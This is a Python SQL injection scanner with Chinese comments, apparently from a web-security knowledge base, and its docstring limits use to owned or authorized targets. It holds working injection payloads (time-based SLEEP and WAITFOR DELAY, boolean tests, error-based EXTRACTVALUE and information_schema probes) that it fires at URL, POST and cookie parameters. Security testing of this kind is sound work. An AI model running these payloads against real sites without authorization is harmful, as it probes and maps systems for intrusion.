文件
websafe-kb/01-sql-injection/tools/sqli-scanner.py

369 行
12 KiB
Python

#!/usr/bin/env python3
"""
SQL Injection Scanner
自动检测SQL注入漏洞点
支持:
- GET/POST 参数注入
- Cookie 注入
- Header 注入
- 时间盲注检测
- 布尔盲注检测
- 报错注入检测
Usage:
python3 sqli-scanner.py -u "http://target.com/page?id=1"
python3 sqli-scanner.py -u "http://target.com" --data "id=1&name=test"
python3 sqli-scanner.py -u "http://target.com" --cookie "id=1"
授权边界:
- 仅用于自有资产、测试环境或已明确授权的目标
- 允许公网验证,但必须确认资产归属或授权关系
- 不面向无授权第三方网站或泛互联网扫描
"""
import argparse
import requests
import re
import time
import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional
import sys
class Colors:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
END = "\033[0m"
BOLD = "\033[1m"
class SQLiScanner:
def __init__(self, timeout: int = 10, threads: int = 5):
self.timeout = timeout
self.threads = threads
self.session = requests.Session()
self.session.headers.update(
{
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}
)
self.error_patterns = [
r"SQL syntax.*MySQL",
r"Warning.*mysql_.*",
r"MySqlException",
r"PostgreSQL.*ERROR",
r"Warning.*pg_.*",
r"Invalid query: pg_",
r"ORA-\d{5}",
r"Oracle.*Driver",
r"Warning.*oci_.*",
r"Microsoft SQL Server",
r"ODBC SQL Server Driver",
r"SQLite.*error",
r"sqlite3.OperationalError",
r"Syntax error.*SQLite",
r"Warning.*sqlite_",
r"DB2 SQL error",
r"DB2 SQLSTATE",
r"Dynamic SQL Error",
r"Warning.*ibase_",
r"PLS-\d{5}",
r"ORA-\d{5}",
r"Error.*SQL.*",
r"Exception.*SQL",
r"SQLSTATE\[\d+\]",
r"mysql_fetch",
r"mysql_num_rows",
r"pg_query",
r"mysql_query",
]
self.time_payloads = [
("' AND SLEEP(5)-- -", "MySQL"),
("' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -", "MySQL"),
("'; WAITFOR DELAY '0:0:5'-- -", "MSSQL"),
("' AND 1=1; WAITFOR DELAY '0:0:5'-- -", "MSSQL"),
("' AND pg_sleep(5)-- -", "PostgreSQL"),
("' OR (SELECT pg_sleep(5))-- -", "PostgreSQL"),
("' AND (SELECT dbms_pipe.receive_message('a',5) FROM dual)-- -", "Oracle"),
("'||dbms_pipe.receive_message(chr(99),5)-- -", "Oracle"),
]
self.bool_payloads = [
("' AND 1=1-- -", "' AND 1=2-- -", "Boolean-based"),
("' OR '1'='1", "' OR '1'='2", "Boolean-based"),
("1 AND 1=1", "1 AND 1=2", "Boolean-based (numeric)"),
("1 OR 1=1", "1 OR 1=2", "Boolean-based (numeric)"),
]
self.error_payloads = [
("'", "Single quote"),
('"', "Double quote"),
("\\", "Backslash"),
("')", "Single quote parenthesis"),
('")', "Double quote parenthesis"),
("' OR 1=1-- -", "OR injection"),
(
"' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- -",
"MSSQL error",
),
(
"' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- -",
"MySQL error",
),
("' AND 1=CAST((SELECT version()) AS INT)-- -", "PostgreSQL error"),
]
def print_result(self, level: str, msg: str):
colors = {
"INFO": Colors.BLUE,
"SUCCESS": Colors.GREEN,
"WARNING": Colors.YELLOW,
"ERROR": Colors.RED,
"VULN": Colors.RED + Colors.BOLD,
}
print(f"{colors.get(level, '')}[{level}]{Colors.END} {msg}")
def test_error_based(
self,
url: str,
param: str,
method: str = "GET",
data: Dict = None,
cookies: Dict = None,
) -> Tuple[bool, Optional[str]]:
"""测试报错注入"""
original_resp = self._request(url, method, data, cookies)
if not original_resp:
return False, None
original_len = len(original_resp.text)
for payload, desc in self.error_payloads:
test_data = data.copy() if data else {}
test_data[param] = payload
resp = self._request(url, method, test_data, cookies)
if not resp:
continue
for pattern in self.error_patterns:
if re.search(pattern, resp.text, re.IGNORECASE):
return (
True,
f"[报错注入] {param} - Payload: {payload} - 类型: {desc} - 匹配: {pattern}",
)
if abs(len(resp.text) - original_len) > 500:
return (
True,
f"[报错注入] {param} - Payload: {payload} - 响应长度差异: {abs(len(resp.text) - original_len)}",
)
return False, None
def test_time_based(
self,
url: str,
param: str,
method: str = "GET",
data: Dict = None,
cookies: Dict = None,
) -> Tuple[bool, Optional[str]]:
"""测试时间盲注"""
for payload, db_type in self.time_payloads:
test_data = data.copy() if data else {}
test_data[param] = payload
start_time = time.time()
resp = self._request(url, method, test_data, cookies, timeout=15)
elapsed = time.time() - start_time
if elapsed >= 4.5:
return (
True,
f"[时间盲注] {param} - Payload: {payload} - 数据库: {db_type} - 延迟: {elapsed:.2f}s",
)
return False, None
def test_bool_based(
self,
url: str,
param: str,
method: str = "GET",
data: Dict = None,
cookies: Dict = None,
) -> Tuple[bool, Optional[str]]:
"""测试布尔盲注"""
for true_payload, false_payload, desc in self.bool_payloads:
test_data_true = data.copy() if data else {}
test_data_true[param] = true_payload
test_data_false = data.copy() if data else {}
test_data_false[param] = false_payload
resp_true = self._request(url, method, test_data_true, cookies)
resp_false = self._request(url, method, test_data_false, cookies)
if not resp_true or not resp_false:
continue
diff = abs(len(resp_true.text) - len(resp_false.text))
if diff > 100:
return (
True,
f"[布尔盲注] {param} - True: {true_payload} - False: {false_payload} - 长度差: {diff}",
)
true_text = resp_true.text.lower()
false_text = resp_false.text.lower()
if (
"success" in true_text or "welcome" in true_text or "admin" in true_text
) and (
"error" in false_text or "fail" in false_text or "wrong" in false_text
):
return True, f"[布尔盲注] {param} - 关键词差异检测到 - {desc}"
return False, None
def _request(
self,
url: str,
method: str,
data: Dict = None,
cookies: Dict = None,
timeout: int = None,
) -> Optional[requests.Response]:
"""发送HTTP请求"""
try:
if method.upper() == "GET":
params = urllib.parse.urlencode(data) if data else ""
full_url = f"{url}?{params}" if params else url
return self.session.get(
full_url,
cookies=cookies,
timeout=timeout or self.timeout,
verify=False,
)
else:
return self.session.post(
url,
data=data,
cookies=cookies,
timeout=timeout or self.timeout,
verify=False,
)
except requests.exceptions.RequestException as e:
return None
def scan_url(
self,
url: str,
method: str = "GET",
data: Dict = None,
cookies: Dict = None,
params: List[str] = None,
) -> List[str]:
"""扫描URL"""
results = []
if not params:
if method == "GET":
parsed = urllib.parse.urlparse(url)
params = list(urllib.parse.parse_qs(parsed.query).keys())
else:
params = list(data.keys()) if data else []
if not params:
self.print_result("WARNING", f"未找到可测试的参数")
return results
self.print_result("INFO", f"开始扫描 {len(params)} 个参数: {', '.join(params)}")
for param in params:
self.print_result("INFO", f"测试参数: {param}")
vuln, msg = self.test_error_based(url, param, method, data, cookies)
if vuln:
results.append(msg)
self.print_result("VULN", msg)
continue
vuln, msg = self.test_bool_based(url, param, method, data, cookies)
if vuln:
results.append(msg)
self.print_result("VULN", msg)
continue
vuln, msg = self.test_time_based(url, param, method, data, cookies)
if vuln:
results.append(msg)
self.print_result("VULN", msg)
return results
def main():
parser = argparse.ArgumentParser(description="SQL Injection Scanner")
parser.add_argument("-u", "--url", required=True, help="目标URL")
parser.add_argument(
"-m", "--method", default="GET", choices=["GET", "POST"], help="HTTP方法"
)
parser.add_argument("-d", "--data", help="POST数据 (格式: id=1&name=test)")
parser.add_argument("-c", "--cookie", help="Cookie")
parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)")
parser.add_argument("-t", "--threads", type=int, default=5, help="线程数")
parser.add_argument("--timeout", type=int, default=10, help="超时时间")
args = parser.parse_args()
requests.packages.urllib3.disable_warnings()
scanner = SQLiScanner(timeout=args.timeout, threads=args.threads)
data = {}
if args.data:
for pair in args.data.split("&"):
if "=" in pair:
k, v = pair.split("=", 1)
data[k] = v
cookies = {}
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
params = args.params.split(",") if args.params else None
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}SQL Injection Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.url}")
scanner.print_result("INFO", f"方法: {args.method}")
results = scanner.scan_url(args.url, args.method, data, cookies, params)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
if results:
scanner.print_result("SUCCESS", f"发现 {len(results)} 个SQL注入漏洞!")
for r in results:
print(f" - {r}")
else:
scanner.print_result("INFO", "未发现SQL注入漏洞")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
if __name__ == "__main__":
main()